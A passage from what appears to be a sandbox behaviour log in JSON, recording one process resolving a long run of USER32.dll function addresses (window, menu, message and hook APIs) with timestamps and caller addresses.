"0x76610000" }, { "name": "FunctionName", "value": "UnhookWindowsHookEx" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76651050" } ], "repeated": 0, "id": 87 }, { "timestamp": "2025-03-02 21:32:31,701", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "USER32.dll" }, { "name": "ModuleHandle", "value": "0x76610000" }, { "name": "FunctionName", "value": "TranslateMessage" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x7664ae40" } ], "repeated": 0, "id": 88 }, { "timestamp": "2025-03-02 21:32:31,701", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "USER32.dll" }, { "name": "ModuleHandle", "value": "0x76610000" }, { "name": "FunctionName", "value": "TranslateMDISysAccel" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x7668e370" } ], "repeated": 0, "id": 89 }, { "timestamp": "2025-03-02 21:32:31,701", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "USER32.dll" }, { "name": "ModuleHandle", "value": "0x76610000" }, { "name": "FunctionName", "value": "TrackPopupMenu" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x7668e9a0" } ], "repeated": 0, "id": 90 }, { "timestamp": "2025-03-02 21:32:31,701", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "USER32.dll" }, { "name": "ModuleHandle", "value": "0x76610000" }, { "name": "FunctionName", "value": "SystemParametersInfoA" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76638580" } ], "repeated": 0, "id": 91 }, { "timestamp": "2025-03-02 21:32:31,717", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "USER32.dll" }, { "name": "ModuleHandle", "value": "0x76610000" }, { "name": "FunctionName", "value": "ShowWindow" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76653030" } ], "repeated": 0, "id": 92 }, { "timestamp": "2025-03-02 21:32:31,717", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "USER32.dll" }, { "name": "ModuleHandle", "value": "0x76610000" }, { "name": "FunctionName", "value": "ShowScrollBar" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76653010" } ], "repeated": 0, "id": 93 }, { "timestamp": "2025-03-02 21:32:31,717", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "USER32.dll" }, { "name": "ModuleHandle", "value": "0x76610000" }, { "name": "FunctionName", "value": "ShowOwnedPopups" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x7663c9b0" } ], "repeated": 0, "id": 94 }, { "timestamp": "2025-03-02 21:32:31,732", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "USER32.dll" }, { "name": "ModuleHandle", "value": "0x76610000" }, { "name": "FunctionName", "value": "SetWindowsHookExA" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x7663b410" } ], "repeated": 0, "id": 95 }, { "timestamp": "2025-03-02 21:32:31,732", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "USER32.dll" }, { "name": "ModuleHandle", "value": "0x76610000" }, { "name": "FunctionName", "value": "SetWindowTextA" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76637720" } ], "repeated": 0, "id": 96 }, { "timestamp": "2025-03-02 21:32:31,732", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "USER32.dll" }, { "name": "ModuleHandle", "value": "0x76610000" }, { "name": "FunctionName", "value": "SetWindowPos" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76652fd0" } ], "repeated": 0, "id": 97 }, { "timestamp": "2025-03-02 21:32:31,732", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "USER32.dll" }, { "name": "ModuleHandle", "value": "0x76610000" }, { "name": "FunctionName", "value": "SetWindowPlacement" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76652fc0" } ], "repeated": 0, "id": 98 }, { "timestamp": "2025-03-02 21:32:31,748", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "USER32.dll" }, { "name": "ModuleHandle", "value": "0x76610000" }, { "name": "FunctionName", "value": "SetWindowLongW" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76645e90" } ], "repeated": 0, "id": 99 }, { "timestamp": "2025-03-02 21:32:31,748", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "USER32.dll" }, { "name": "ModuleHandle", "value": "0x76610000" }, { "name": "FunctionName", "value": "SetWindowLongA" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x766387c0" } ], "repeated": 0, "id": 100 }, { "timestamp": "2025-03-02 21:32:31,748", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "USER32.dll" }, { "name": "ModuleHandle", "value": "0x76610000" }, { "name": "FunctionName", "value": "SetTimer" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x7664f510" } ], "repeated": 0, "id": 101 }, { "timestamp": "2025-03-02 21:32:31,748", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "USER32.dll" }, { "name": "ModuleHandle", "value": "0x76610000" }, { "name": "FunctionName", "value": "SetScrollRange" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x7662d870" } ], "repeated": 0, "id": 102 }, { "timestamp": "2025-03-02 21:32:31,764", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "USER32.dll" }, { "name": "ModuleHandle", "value": "0x76610000" }, { "name": "FunctionName", "value": "SetScrollPos" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x7662d2f0" } ], "repeated": 0, "id": 103 }, { "timestamp": "2025-03-02 21:32:31,764", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "USER32.dll" }, { "name": "ModuleHandle", "value": "0x76610000" }, { "name": "FunctionName", "value": "SetScrollInfo" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x7662f880" } ], "repeated": 0, "id": 104 }, { "timestamp": "2025-03-02 21:32:31,764", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "USER32.dll" }, { "name": "ModuleHandle", "value": "0x76610000" }, { "name": "FunctionName", "value": "SetRect" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x7664f3a0" } ], "repeated": 0, "id": 105 }, { "timestamp": "2025-03-02 21:32:31,764", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "USER32.dll" }, { "name": "ModuleHandle", "value": "0x76610000" }, { "name": "FunctionName", "value": "SetPropA" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76638bb0" } ], "repeated": 0, "id": 106 }, { "timestamp": "2025-03-02 21:32:31,764", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "USER32.dll" }, { "name": "ModuleHandle", "value": "0x76610000" }, { "name": "FunctionName", "value": "SetParent" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76650f70" } ], "repeated": 0, "id": 107 }, { "timestamp": "2025-03-02 21:32:31,764", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "USER32.dll" }, { "name": "ModuleHandle", "value": "0x76610000" }, { "name": "FunctionName", "value": "SetMenuItemInfoA" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x766a45e0" } ], "repeated": 0, "id": 108 }, { "timestamp": "2025-03-02 21:32:31,764", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "USER32.dll" }, { "name": "ModuleHandle", "value": "0x76610000" }, { "name": "FunctionName", "value": "SetMenu" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x7663c650" } ], "repeated": 0, "id": 109 }, { "timestamp": "2025-03-02 21:32:31,779", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "USER32.dll" }, { "name": "ModuleHandle", "value": "0x76610000" }, { "name": "FunctionName", "value": "SetForegroundWindow" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76651090" } ], "repeated": 0, "id": 110 }, { "timestamp": "2025-03-02 21:32:31,779", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "USER32.dll" }, { "name": "ModuleHandle", "value": "0x76610000" }, { "name": "FunctionName", "value": "SetFocus" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76652dc0" } ], "repeated": 0, "id": 111 }, { "timestamp": "2025-03-02 21:32:31,779", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "USER32.dll" }, { "name": "ModuleHandle", "value": "0x76610000" }, { "name": "FunctionName", "value": "SetCursor" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x766518bc" } ], "repeated": 0, "id": 112 }, { "timestamp": "2025-03-02 21:32:31,779", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "USER32.dll" }, { "name": "ModuleHandle", "value": "0x76610000" }, { "name": "FunctionName", "value": "SetClassLongA" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x7663c350" } ], "repeated": 0, "id": 113 }, { "timestamp": "2025-03-02 21:32:31,779", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "USER32.dll" }, { "name": "ModuleHandle", "value": "0x76610000" }, { "name": "FunctionName", "value": "SetCapture" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76652cc0" } ], "repeated": 0, "id": 114 }, { "timestamp": "2025-03-02 21:32:31,779", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "USER32.dll" }, { "name": "ModuleHandle", "value": "0x76610000" }, { "name": "FunctionName", "value": "SetActiveWindow" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76652c70" } ], "repeated": 0, "id": 115 }, { "timestamp": "2025-03-02 21:32:31,779", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "USER32.dll" }, { "name": "ModuleHandle", "value": "0x76610000" }, { "name": "FunctionName", "value": "SendMessageW" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76646150" } ], "repeated": 0, "id": 116 }, { "timestamp": "2025-03-02 21:32:31,795", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "USER32.dll" }, { "name": "ModuleHandle", "value": "0x76610000" }, { "name": "FunctionName", "value": "SendMessageA" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76634980" } ], "repeated": 0, "id": 117 }, { "timestamp": "2025-03-02 21:32:31,795", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "USER32.dll" }, { "name": "ModuleHandle", "value": "0x76610000" }, { "name": "FunctionName", "value": "ScrollWindow" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x7663ab90" } ], "repeated": 0, "id": 118 }, { "timestamp": "2025-03-02 21:32:31,795", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "USER32.dll" }, { "name": "ModuleHandle", "value": "0x76610000" }, { "name": "FunctionName", "value": "ScreenToClient" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x766498b0" } ], "repeated": 0, "id": 119 }, { "timestamp": "2025-03-02 21:32:31,795", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "USER32.dll" }, { "name": "ModuleHandle", "value": "0x76610000" }, { "name": "FunctionName", "value": "RemovePropA" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76639d00" } ], "repeated": 0, "id": 120 }, { "timestamp": "2025-03-02 21:32:31,795", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "USER32.dll" }, { "name": "ModuleHandle", "value": "0x76610000" }, { "name": "FunctionName", "value": "RemoveMenu" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76652bd0" } ], "repeated": 0, "id": 121 }, { "timestamp": "2025-03-02 21:32:31,795", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "USER32.dll" }, { "name": "ModuleHandle", "value": "0x76610000" }, { "name": "FunctionName", "value": "ReleaseDC" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x7664ef30" } ], "repeated": 0, "id": 122 }, { "timestamp": "2025-03-02 21:32:31,795", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "USER32.dll" }, { "name": "ModuleHandle", "value": "0x76610000" }, { "name": "FunctionName", "value": "ReleaseCapture" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76639820" } ], "repeated": 0, "id": 123 }, { "timestamp": "2025-03-02 21:32:31,810", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "USER32.dll" }, { "name": "ModuleHandle", "value": "0x76610000" }, { "name": "FunctionName", "value": "RegisterWindowMessageA" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x7664ef70" } ], "repeated": 0, "id": 124 }, { "timestamp": "2025-03-02 21:32:31,810", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "USER32.dll" }, { "name": "ModuleHandle", "value": "0x76610000" }, { "name": "FunctionName", "value": "RegisterClipboardFormatA" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x7664ef70" } ], "repeated": 0, "id": 125 }, { "timestamp": "2025-03-02 21:32:31,810", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "USER32.dll" }, { "name": "ModuleHandle", "value": "0x76610000" }, { "name": "FunctionName", "value": "RegisterClassA" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76632760" } ], "repeated": 0, "id": 126 }, { "timestamp": "2025-03-02 21:32:31,810", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "USER32.dll" }, { "name": "ModuleHandle", "value": "0x76610000" }, { "name": "FunctionName", "value": "RedrawWindow" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76652af0" } ], "repeated": 0, "id": 127 }, { "timestamp": "2025-03-02 21:32:31,810", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "USER32.dll" }, { "name": "ModuleHandle", "value": "0x76610000" }, { "name": "FunctionName", "value": "PtInRect" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76634aa0" } ], "repeated": 0, "id": 128 }, { "timestamp": "2025-03-02 21:32:31,810", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "USER32.dll" }, { "name": "ModuleHandle", "value": "0x76610000" }, { "name": "FunctionName", "value": "PostQuitMessage" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76651220" } ], "repeated": 0, "id": 129 }, { "timestamp": "2025-03-02 21:32:31,810", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "USER32.dll" }, { "name": "ModuleHandle", "value": "0x76610000" }, { "name": "FunctionName", "value": "PostMessageA" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x766340e0" } ], "repeated": 0, "id": 130 }, { "timestamp": "2025-03-02 21:32:31,826", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "USER32.dll" }, { "name": "ModuleHandle", "value": "0x76610000" }, { "name": "FunctionName", "value": "PeekMessageW" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x7664c090" } ], "repeated": 0, "id": 131 }, { "timestamp": "2025-03-02 21:32:31,826", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "USER32.dll" }, { "name": "ModuleHandle", "value": "0x76610000" }, { "name": "FunctionName", "value": "PeekMessageA" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76630540" } ], "repeated": 0, "id": 132 }, { "timestamp": "2025-03-02 21:32:31,826", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "USER32.dll" }, { "name": "ModuleHandle", "value": "0x76610000" }, { "name": "FunctionName", "value": "OffsetRect" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x7664b240" } ], "repeated": 0, "id": 133 }, { "timestamp": "2025-03-02 21:32:31,826", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "USER32.dll" }, { "name": "ModuleHandle", "value": "0x76610000" }, { "name": "FunctionName", "value": "OemToCharA" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x766930a0" } ], "repeated": 0, "id": 134 }, { "timestamp": "2025-03-02 21:32:31,826", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "USER32.dll" }, { "name": "ModuleHandle", "value": "0x76610000" }, { "name": "FunctionName", "value": "MessageBoxA" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76690950" } ], "repeated": 0, "id": 135 }, { "timestamp": "2025-03-02 21:32:31,826", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "USER32.dll" }, { "name": "ModuleHandle", "value": "0x76610000" }, { "name": "FunctionName", "value": "MapWindowPoints" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76645280" } ], "repeated": 0, "id": 136 }, { "timestamp": "2025-03-02 21:32:31,826", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "USER32.dll" }, { "name": "ModuleHandle", "value": "0x76610000" }, { "name": "FunctionName", "value": "MapVirtualKeyA" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x7663b250" } ], "repeated": 0, "id": 137 }, { "timestamp": "2025-03-02 21:32:31,842", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "USER32.dll" }, { "name": "ModuleHandle", "value": "0x76610000" }, { "name": "FunctionName", "value": "LoadStringA" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76635870" } ], "repeated": 0, "id": 138 }, { "timestamp": "2025-03-02 21:32:31,842", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "USER32.dll" }, { "name": "ModuleHandle", "value": "0x76610000" }, { "name": "FunctionName", "value": "LoadKeyboardLayoutA" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x766a0610" } ], "repeated": 0, "id": 139 }, { "timestamp": "2025-03-02 21:32:31,842", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "USER32.dll" }, { "name": "ModuleHandle", "value": "0x76610000" }, { "name": "FunctionName", "value": "LoadIconA" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x7663a350" } ], "repeated": 0, "id": 140 }, { "timestamp": "2025-03-02 21:32:31,842", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "USER32.dll" }, { "name": "ModuleHandle", "value": "0x76610000" }, { "name": "FunctionName", "value": "LoadCursorA" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76650ce0" } ], "repeated": 0, "id": 141 }, { "timestamp": "2025-03-02 21:32:31,842", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "USER32.dll" }, { "name": "ModuleHandle", "value": "0x76610000" }, { "name": "FunctionName", "value": "LoadBitmapA" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x7663c0f0" } ], "repeated": 0, "id": 142 }, { "timestamp": "2025-03-02 21:32:31,842", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "USER32.dll" }, { "name": "ModuleHandle", "value": "0x76610000" }, { "name": "FunctionName", "value": "KillTimer" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x766527e0" } ], "repeated": 0, "id": 143 }, { "timestamp": "2025-03-02 21:32:31,842", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "USER32.dll" }, { "name": "ModuleHandle", "value": "0x76610000" }, { "name": "FunctionName", "value": "IsZoomed" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76645fb0" } ], "repeated": 0, "id": 144 }, { "timestamp": "2025-03-02 21:32:31,857", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "USER32.dll" }, { "name": "ModuleHandle", "value": "0x76610000" }, { "name": "FunctionName", "value": "IsWindowVisible" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76645eb0" } ], "repeated": 0, "id": 145 }, { "timestamp": "2025-03-02 21:32:31,857", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "USER32.dll" }, { "name": "ModuleHandle", "value": "0x76610000" }, { "name": "FunctionName", "value": "IsWindowUnicode" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x766469a0" } ], "repeated": 0, "id": 146 }, { "timestamp": "2025-03-02 21:32:31,857", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "USER32.dll" }, { "name": "ModuleHandle", "value": "0x76610000" }, { "name": "FunctionName", "value": "IsWindowEnabled" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76645340" } ], "repeated": 0, "id": 147 }, { "timestamp": "2025-03-02 21:32:31,857", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "USER32.dll" }, { "name": "ModuleHandle", "value": "0x76610000" }, { "name": 